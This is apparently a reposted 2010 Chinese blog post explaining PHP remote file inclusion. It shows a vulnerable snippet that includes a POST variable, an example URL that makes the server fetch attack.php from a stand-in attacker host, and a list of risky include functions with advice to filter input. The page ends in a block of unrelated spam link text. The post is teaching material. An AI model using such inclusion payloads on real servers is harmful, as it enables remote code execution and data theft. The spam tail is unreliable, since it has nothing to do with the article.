• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉(zhuǎn)】WEB安全系列之三:執(zhí)行惡意腳本

                * 惡意代碼執(zhí)行攻擊利用的重點(diǎn)是web開發(fā)中引用變量做為程序執(zhí)行的一部分代碼
                * 惡意代碼執(zhí)行攻擊的技術(shù)重點(diǎn)在于讓服務(wù)器執(zhí)行了惡意代碼,從而完成入侵或數(shù)據(jù)盜取等行為
                * 惡意代碼執(zhí)行攻擊的方法重點(diǎn)在于Web開發(fā)中,對變量的引用的幾個關(guān)鍵部位沒有細(xì)化處理


               本文主要介紹惡意代碼執(zhí)行攻擊的過程而不是技術(shù)細(xì)節(jié)。
            先看一段php代碼的例子:

            $report = $_POST['file']; //定義report變量某個表單變量
            include $report;          //在代碼中包含此變量

            如果攻擊者巧妙的利用這個漏洞,就可以令被攻擊服務(wù)器執(zhí)行自己的惡意程序,類似的語法:
            http://www.tester.com/index.php?file=http://www.hacker.com/attack.php

            這時,程序就會讀取惡意的attack.php并引入到index.php中做為執(zhí)行的一個部分!

            此類攻擊對于腳本類網(wǎng)頁代碼最有效。

            在編寫代碼時,尤其是利用以下的函數(shù)引用代碼片段時:
            PHP:include(), include_once(), require(), require_once(), fopen(), readfile(), ...
            JSP/Servlet:java.io.File(), java.io.FileReader(), ...
            ASP:include file, include virtual, ...
            應(yīng)該對所引用的內(nèi)容做安全的過濾!

            posted on 2010-04-14 14:24 小默 閱讀(593) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導(dǎo)航

            統(tǒng)計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            夜夜亚洲天天久久| 久久91精品国产91久久小草| 国产精品美女久久久免费| 四虎影视久久久免费观看| 狠狠色婷婷久久综合频道日韩 | 亚洲午夜久久久久久噜噜噜| 老色鬼久久亚洲AV综合| 亚洲精品久久久www| 狠狠色丁香婷婷久久综合不卡| 国产一区二区精品久久岳| 久久亚洲中文字幕精品有坂深雪| 久久er热视频在这里精品| 免费久久人人爽人人爽av| 国产福利电影一区二区三区久久久久成人精品综合 | 久久国产精品77777| 日本WV一本一道久久香蕉| 久久青青草原精品影院| 国产精品久久国产精麻豆99网站| 久久精品成人欧美大片| 狠狠色噜噜色狠狠狠综合久久| 免费观看成人久久网免费观看| 中文精品久久久久人妻不卡| 久久人人爽人人澡人人高潮AV| 99久久精品国产一区二区三区| 亚洲精品国精品久久99热| 国产精品免费久久| 久久久精品一区二区三区| 久久人人爽爽爽人久久久| 久久人人爽人人爽人人片AV东京热 | 久久精品夜色噜噜亚洲A∨| 久久九色综合九色99伊人| www.久久热.com| 72种姿势欧美久久久久大黄蕉| 亚洲中文字幕无码久久2017| 思思久久99热只有频精品66| 亚洲AV日韩AV永久无码久久| 国产一区二区三区久久精品| 99久久99久久| 国产69精品久久久久9999| 国产精品青草久久久久婷婷| 国产欧美久久久精品|